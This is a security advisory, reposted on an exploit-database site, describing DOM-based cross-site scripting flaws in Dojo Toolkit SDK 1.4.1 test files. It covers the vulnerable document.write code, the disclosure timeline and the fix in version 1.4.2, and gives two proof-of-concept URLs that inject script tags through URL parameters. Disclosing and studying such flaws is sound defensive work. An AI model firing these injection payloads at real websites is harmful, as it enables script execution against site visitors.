0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dojo Toolkit SDK v1.4.1 Cross Site Scripting Vulnerability
========================================================== Dojo Toolkit SDK v1.4.1 Cross Site Scripting Vulnerability ========================================================== =========================================================== Multiple DOM-Based XSS in Dojo Toolkit SDK Public Release Date: 3/12/2010 Adam Bixby - Gotham Digital Science (labs@gdssecurity.com) Affected Software: Dojo Toolkit SDK <= Build 1.4.1 Browser used for testing: IE8 (8.0.7600.16385) Severity: High =========================================================== 1. Summary =========================================================== The Dojo Toolkit is an open source modular JavaScript library/toolkit designed to ease the rapid development of cross platform, JavaScript/Ajax based applications and web sites. Multiple instances of DOM-based Cross Site Scripting (XSS) vulnerabilities were found in the _testCommon.js and runner.html files within the SDK. The XSS vulnerabilities appear to affect all websites that deploy any of the affected SDK files. These files are designed for testing, however a Google search identified numerous sites which have deployed these files along with the core framework components. More information on DOM-based XSS can be found at http://www.owasp.org/index.php/DOM_Based_XSS. The vendor (Dojo Foundation) was notified of this issue on February 19, 2010. The vendor responded by releasing version 1.4.2 on March 12, 2010 and has also issued a security bulletin: http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/. =========================================================== 2. Technical Details =========================================================== File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\dijit\tests\_testCommon.js 1) Data enters via "theme" URL parameter through the window.location.href property. Line 25: var str = window.location.href.substr(window.location.href.indexOf("?")+1).split(/#/); ..snip.. 2) The "theme" variable with user-controllable input is then passed into "themeCss" and "themeCssRtl" which is then passed to document.write(). Writing the un-validated data to HTML creates the XSS exposure. Line 54: ..snip.. var themeCss = d.moduleUrl("dijit.themes",theme+"/"+theme+".css"); var themeCssRtl = d.moduleUrl("dijit.themes",theme+"/"+theme+"_rtl.css"); document.write('<link rel="stylesheet" type="text/css" href="'+themeCss+'">'); document.write('<link rel="stylesheet" type="text/css" href="'+themeCssRtl+'">'); =========================================================== File: dojo-release-1.4.1-src\dojo-release-1.4.1-src\util\doh\runner.html 1) Data enters via "dojoUrl" or "testUrl" URL parameters through the window.location.search property. Line 40: var qstr = window.location.search.substr(1); ..snip.. 2) The "dojoUrl" and "testUrl" variables with user-controllable input are passed to document.write(). Writing the un-validated data to HTML creates the XSS exposure. Line 64: document.write("<scr"+"ipt type='text/javascript' djConfig='isDebug: true' src='"+dojoUrl+"'></scr"+"ipt>"); ..snip.. document.write("<scr"+"ipt type='text/javascript' src='"+testUrl+".js'></scr"+"ipt>"); =========================================================== 3. Proof-of-Concept Exploit =========================================================== This vulnerability can be exploited against websites that have deployed any of the 145 SDK files which reference _testCommon.js. Reproduction Request: http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script> (Note: test_Button.html is one of the SDK files that includes the _testCommon.js file) ============================================================ This vulnerability can be exploited against any website that has deployed the runner.html file. Reproduction Request: http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script> =========================================================== 4. Recommendation =========================================================== Update to Dojo Toolkit SDK 1.4.2 =========================================================== # 0day.today [2024-07-05] #